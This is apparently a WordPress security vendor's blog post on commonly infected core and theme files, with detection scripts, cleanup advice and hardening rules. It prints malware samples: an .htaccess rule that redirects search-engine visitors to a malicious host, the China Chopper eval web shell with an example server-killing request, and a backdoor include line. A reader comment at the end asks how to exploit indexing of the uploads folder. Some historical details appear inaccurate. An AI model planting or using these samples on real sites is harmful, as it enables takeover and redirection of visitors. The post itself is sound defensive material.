
Commonly Hacked WordPress Files. How to Scan & Fix Infected WordPress Files?

Updated on: May 4, 2020


WordPress is a democratic revolution when it comes to creating and hosting content, and this has led to a massive upsurge in its popularity. According to the official WordPress website, it powers around 32% of internet sites. However, at times WP sites are compromised by attacks like the wp-config.php hack. Nevertheless, the popularity of WordPress comes from its open source structure. Commenting on this, its founder Matt Mullenweg said:

Two things WordPress has been able to exemplify is that Open Source can create great user experiences and that it’s possible to have a successful commercial entity and a wider free software community living and working in harmony.

However, at times vulnerabilities in WordPress have led to the compromise of thousands of sites, as in the infamous case of the Slider Revolution issue. This was an LFI vulnerability which exposed the wp-config.php file, leading to the wp-config.php hack we discuss in this article. Before it was patched, thousands of websites had been compromised with the SoakSoak.ru malware. The highlight of this hack was the Panama leak caused by this malware.

1) WordPress wp-config.php Hack

wp-config.php is an important file in a WP installation. It acts as the bridge between the WP file system and the MySQL database, and it contains the database connection credentials. Apart from this, it is also used for:

  • Defining the security keys
  • Specifying the database prefix
  • Setting the default language for the admin panel


Therefore, owing to its sensitive nature, it is a ripe target. In November 2016, a critical flaw was found in the Revolution Image Slider plugin. This was an LFI (Local File Inclusion) vulnerability: with a short snippet of code, the attacker could access the wp-config file. This led to a wp-config.php hack.


By appending this code to any URL, the wp-config file could be accessed. The SoakSoak.ru malware actively exploited this. The first step was to access the file to conduct the wp-config.php hack. Second, a malicious theme was uploaded to the WP site, which installed the Filesman backdoor. Apart from this, swfobject.js was modified to redirect users, thus completing the WordPress hack via wp-config.

2) WordPress index.php Hacked

index.php loads the default theme for a WP installation. The template hierarchy can be difficult to grasp, so in layman's terms: there should be either a front-page.php file or a home.php file, and if neither is present, index.php is served. If there is no index.php either, directory listing gets enabled, which can expose sensitive files. Therefore, index.php is appealing to attackers.

For instance, the pub2srv malware targeted index.php files. Researchers at Astra were monitoring this widespread malware redirection campaign. First, the website is compromised using SQL injection. Then, index.php is injected with JavaScript. As a result, users are redirected or pop-ups are displayed. The infected index.php files were found injected with a code snippet like the one shown below.

[Image: sample of the JavaScript injected into index.php]

Updates can also cause a problem with index.php. Web admins often rename the index file to index.php.old while updating. There are web scanners designed specifically to find such files, and once found, they can leak sensitive information to attackers, who could use it to compromise the site!


3) WordPress .htaccess Hacked

The .htaccess file modifies the way the site is accessed. It is a very powerful and versatile component that contributes to the security of your WP installation. Using it, we can:

  • Restrict access to certain folders of the site.
  • Create redirects.
  • Force HTTPS.
  • Manage caching.
  • Prevent a few script injection attacks.
  • Stop bots from finding usernames.
  • Block image hotlinking.
  • Force automatic downloads of a file.
  • Manage file extensions.

However, when the site is under attack these same features can be used to harvest clicks for the attacker. Often, the .htaccess file is injected with malicious code to redirect users; sometimes it is used to display spam. For instance, look at the code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The RewriteRule in the last line redirects user traffic away from the site: the preceding RewriteCond lines match visitors whose referrer is one of the listed search engines, and those users are redirected to http://MaliciousDomain.tld, which then tries to load the bad.php script. If you notice unusual redirects from your site, it is most likely due to an .htaccess file hack. However, if the file is empty, do not panic: in that case the server automatically fills in the contents.

WordPress Theme Files Hacked

1) WordPress Footer.php Hacked

The footer area of WordPress is defined by the file footer.php. This area contains widgets that remain the same throughout the website, for example the share widget or the social media widgets at the bottom of the site, or at times just copyright info, credits, etc. However, thanks to HTML5's new methods footer.php has become more powerful: footer elements can now be used not only at the bottom but in other sections of the site as well.

So footer.php is an important file that can be targeted by attackers. It is often used for malware redirects and displaying spam content, as was the case with the Default7.com Redirect Malware. In many cases, footer.php was infected with JavaScript in the primary stages, while in the later stages header.php was the target. Moreover, the encrypted values for the redirect were stored in a .SIc7CYwgY or .SIc7CYwgY1 file in the site root; if these locations were unavailable, /var/tmp/.SIc7CYwgY was used.

2) WordPress Header.php Hacked

The header.php file helps developers customize the header image of the theme, and thus header.php was the second target of the Default7.com Redirect Malware. However, adding the same functions to both footer and header resulted in some errors. The header.php file was modified to insert malicious code. Even though the code mostly looked like gibberish, decoding it made things clearer: it basically redirected users to a website. Cookies were also used to uniquely identify the users, and this cookie had a lifetime of one year.

[Image: decoded malicious code from header.php]

Moreover, in another instance, the attackers injected JavaScript into all files with a .js extension. What makes such malware difficult to detect is that it sits inside the core files!

3) WordPress Functions.php Hacked

The functions file behaves like a plugin, which means it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used:

  • To call WordPress functions.
  • To call native PHP functions.
  • To define your own functions.

Moreover, functions.php is present in every theme, but only the functions.php of the active theme affects site rendering. Hence, this file was actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages into the site, so sites showed signs of Pharma and Japanese SEO spam. The infected functions.php contained a line like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As is evident from the code above, this file includes the class.theme-modules.php file, which is then used to install the malware into other themes, creating new users and backdoors. This allowed attackers to access the site even after the file was cleaned up!


4) WordPress wp-load.php Hacked

wp-load.php is an important file for every plugin: it bootstraps the WordPress environment, which gives plugins the ability to use the native WP core functions. Many malware variants infect WordPress sites by creating malicious wp-load files, as was seen in the case of the China Chopper web shell malware. Its typical behavior was to create files like wp-load-eFtAh.php on the server. These files would contain code like:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code supplied in the pass request parameter. Using this, further harmful commands could be executed. For instance, the command http://yoursite/your.php?pass=system("killall -9 apache"); could kill the Apache processes and shut down the entire server. In a nutshell, this is a small yet dangerous piece of malware that could take complete hold of the server!
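The indicators quoted in the .htaccess, functions.php and wp-load.php sections above can be turned into a simple file scan. The following Python script is an added example, not code from the article or from Astra: it walks a WordPress tree, flags file names matching the dropped wp-load-<random>.php, stale index.php.old and hidden .SIc7CYwgY patterns, and flags file contents matching the quoted eval($_POST[...]) web shell, the class.theme-modules.php include in functions.php, and a referrer-conditioned RewriteRule pointing at an external host. The sample site it scans is constructed in a temporary directory; the labels, regexes and sample file contents are my own.

```python
"""Added example: signature scan for the infected-file indicators quoted above."""
import os
import re
import tempfile
from pathlib import Path

# Content indicators taken from the samples quoted in the article.
# Each entry: (label, regex, predicate on the file name deciding whether to check it)
CONTENT_SIGNATURES = [
    ("eval() of a request parameter",
     re.compile(r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I),
     lambda name: name.endswith(".php")),
    ("wp-vcd loader include of class.theme-modules.php",
     re.compile(r"include(?:_once)?\s*\(.*class\.theme-modules\.php", re.I),
     lambda name: name == "functions.php"),
    ("referrer-conditioned redirect to an external host",
     re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}[\s\S]*?RewriteRule\s+\S+\s+https?://", re.I),
     lambda name: name == ".htaccess"),
]

# File-name indicators: names that do not belong in a clean install.
FILENAME_SIGNATURES = [
    ("dropped wp-load-<random>.php web shell", re.compile(r"^wp-load-[A-Za-z0-9]+\.php$")),
    ("stale index.php.old left from an update", re.compile(r"^index\.php\.old$", re.I)),
    ("hidden Default7 redirect data file", re.compile(r"^\.SIc7CYwgY1?$")),
]


def scan_file(path, root):
    """Return (relative_path, label) findings for one file."""
    rel = path.relative_to(root).as_posix()
    findings = [(rel, label) for label, pattern in FILENAME_SIGNATURES if pattern.match(path.name)]
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings  # unreadable file: report name matches only
    findings += [(rel, label) for label, pattern, applies in CONTENT_SIGNATURES
                 if applies(path.name) and pattern.search(text)]
    return findings


def scan_tree(root):
    """Walk a WordPress install and return all findings, sorted by path."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(scan_file(Path(dirpath) / name, root))
    return sorted(findings)


# Constructed sample site: a few clean files plus files carrying the quoted indicators.
SAMPLE_FILES = {
    "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n",
    "index.php.old": "<?php // stale copy left behind by an update (constructed)\n",
    "wp-load-eFtAh.php": "<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>\n",
    ".SIc7CYwgY": "constructed placeholder for the redirect data file\n",
    ".htaccess": ("RewriteEngine On\n"
                  "RewriteCond %{HTTP_REFERER} .*google.*$ [NC]\n"
                  "RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]\n"),
    "wp-content/themes/demo/functions.php": (
        "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) "
        "include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>\n"),
    "wp-content/themes/demo/footer.php": "<?php wp_footer(); ?></body></html>\n",
    "wp-content/uploads/.htaccess": "Options -Indexes\n",
}


def build_sample_site(base):
    """Write SAMPLE_FILES under base/site and return that root."""
    root = Path(base) / "site"
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def demo_scan():
    """Build the constructed site in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_site(tmp))


if __name__ == "__main__":
    for rel, label in demo_scan():
        print(f"{rel}: {label}")
```

Run against a real install, scan_tree() takes the document root; a hit is a reason to inspect the file, not proof of infection on its own, and a clean result only means none of these particular indicators is present. The signature list is easy to extend as new samples are collected.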

WordPress Files Cleanup

1) Cleaning Files

First, investigate the cause of the attack (for example, the wp-config.php hack) and remove the malicious code. Second, restore the infected files from a backup; if no backup is available, use fresh files. In any case, ensure that a backup copy is present at all times.
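One way to carry out the "restore from backup or fresh files" step is a hash manifest: compute digests of a known-clean tree (a fresh download of the same WordPress version and theme), compare the live install against it, copy back whatever differs or is missing, and move unexpected files aside. The Python below is an added example, not the article's or Astra's code; the clean and live trees are constructed in a temporary directory, the file contents are placeholders, and wp-content/uploads is deliberately excluded because user uploads never appear in a clean download.

```python
"""Added example: hash-manifest integrity check and restore from a clean tree."""
import hashlib
import shutil
import tempfile
from pathlib import Path

# User uploads are never part of a clean WordPress download, so they are not
# compared; everything else (core, themes, plugins) is expected to match.
IGNORE_PREFIXES = ("wp-content/uploads/",)


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root):
    """Map relative POSIX path -> sha256 for every compared file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*")
            if p.is_file() and not p.relative_to(root).as_posix().startswith(IGNORE_PREFIXES)}


def compare(live_root, manifest):
    """Classify the live install against the clean manifest."""
    live = hash_tree(live_root)
    return {
        "modified": sorted(r for r in manifest if r in live and live[r] != manifest[r]),
        "missing": sorted(r for r in manifest if r not in live),
        "added": sorted(r for r in live if r not in manifest),
    }


def restore(live_root, clean_root, report, quarantine):
    """Copy modified/missing files back from the clean tree and move unexpected
    files to a quarantine directory (kept for investigation, not deleted)."""
    live_root, clean_root, quarantine = Path(live_root), Path(clean_root), Path(quarantine)
    actions = []
    for rel in report["modified"] + report["missing"]:
        dst = live_root / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(clean_root / rel, dst)
        actions.append(("restored", rel))
    for rel in report["added"]:
        dst = quarantine / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(live_root / rel), str(dst))
        actions.append(("quarantined", rel))
    return actions


# Constructed stand-ins for a clean install; contents are placeholders.
CLEAN_FILES = {
    "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';\n",
    "wp-load.php": "<?php // constructed stand-in for the WordPress bootstrap file\n",
    "wp-includes/version.php": "<?php // constructed stand-in\n",
    "wp-content/themes/demo/functions.php": "<?php add_theme_support('title-tag');\n",
}


def write_tree(root, files):
    for rel, content in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def demo():
    """Build clean and infected trees, compare, restore, and compare again."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live, quarantine = (Path(tmp) / n for n in ("clean", "live", "quarantine"))
        write_tree(clean, CLEAN_FILES)
        infected = dict(CLEAN_FILES)
        # the wp-vcd style include from the article, a dropped wp-load variant,
        # a missing core file, and a legitimate upload that must be left alone
        infected["wp-content/themes/demo/functions.php"] = (
            "<?php include_once(dirname(__FILE__) . '/class.theme-modules.php');\n")
        infected["wp-load-eFtAh.php"] = "<?php // constructed dropped file\n"
        infected["wp-content/uploads/2020/05/photo.jpg"] = "not really an image (constructed)\n"
        del infected["wp-includes/version.php"]
        write_tree(live, infected)

        manifest = hash_tree(clean)
        before = compare(live, manifest)
        actions = restore(live, clean, before, quarantine)
        after = compare(live, manifest)
        return before, actions, after


if __name__ == "__main__":
    before, actions, after = demo()
    print("before:", before)
    print("actions:", actions)
    print("after:", after)
```

For the core files, WP-CLI's wp core verify-checksums performs the same comparison against the checksums published by wordpress.org; the manifest approach above extends it to themes and plugins, provided the clean copies come from the official sources and not from the compromised server. Quarantining rather than deleting unexpected files keeps them available for the investigation step.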

2) Secure Using Plugins

At times the site may fall prey to automation: an automated brute force attack can compromise the admin panel. The AG Custom Admin plugin can help by hiding this page; it renames the login panel to a keyword of the user's choice. Moreover, certain plugins can block username enumeration.

3) Hiding Files

Often, exposed files reveal sensitive info, which could lead to a wp-config.php hack. Therefore it becomes necessary to hide these files on the server, and the .htaccess file can help with this. To hide wp-content/uploads, add the following code to the .htaccess file inside that directory:

# wp-content/uploads/.htaccess (Apache 2.2 access-control syntax; Apache 2.4 uses "Require all denied")
# With "Order Allow,Deny" the Deny directive wins, so every direct request to this directory is refused
Order Allow,Deny
Deny from all

To hide wp-includes, add this to the .htaccess file in the site root:

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

The WP Hardening Plugin can also help to hide details of a WordPress site, making it hard for attackers to identify and exploit!


4) Updating

Always ensure that the WP installation is up to date; most loopholes can be plugged by running an updated installation. Use reputed plugins and themes only, and avoid poorly coded or nulled themes. Moreover, update the plugins regularly along with the core installation, thus keeping attacks like the wp-config.php hack at bay.


5) Firewall

A firewall goes a long way in securing your site. It monitors incoming traffic and takes preventive measures to block infection, and it can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today; the one at Astra is flexible and suitable for your needs.


The Astra firewall can detect infections and remove them. Apart from that, all the vulnerabilities will be automatically plugged.


6) WordPress Security Audit or Pen testing

With WordPress being the most popular CMS in use, and thus a place of increased security issues, attackers are always on the prowl for exploitable vulnerabilities in WordPress websites. Consequently, pen-testing a WordPress site has become essential to keep it secure from attacks. Penetration testing is a simulated attack performed against a web application, network or computer system to evaluate its security and find its vulnerabilities before an attacker does, thus helping to protect it. One of the checks carried out while pen-testing a WordPress site is to look for a directory listing vulnerability, which indexes sensitive directories and files such as wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content etc. and could thus provide an attacker with sensitive information.




Shikhil Sharma

Shikhil Sharma is the founder & CEO of Astra Web Security. Having been involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing. From time to time, he shares his knowledge on core cybersecurity topics on Astra’s blog. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football.


Hendrick Laama

Hello, really post. Please, I have a question. How can I exploit a WordPress site where wp-content/upload indexing is enabled?
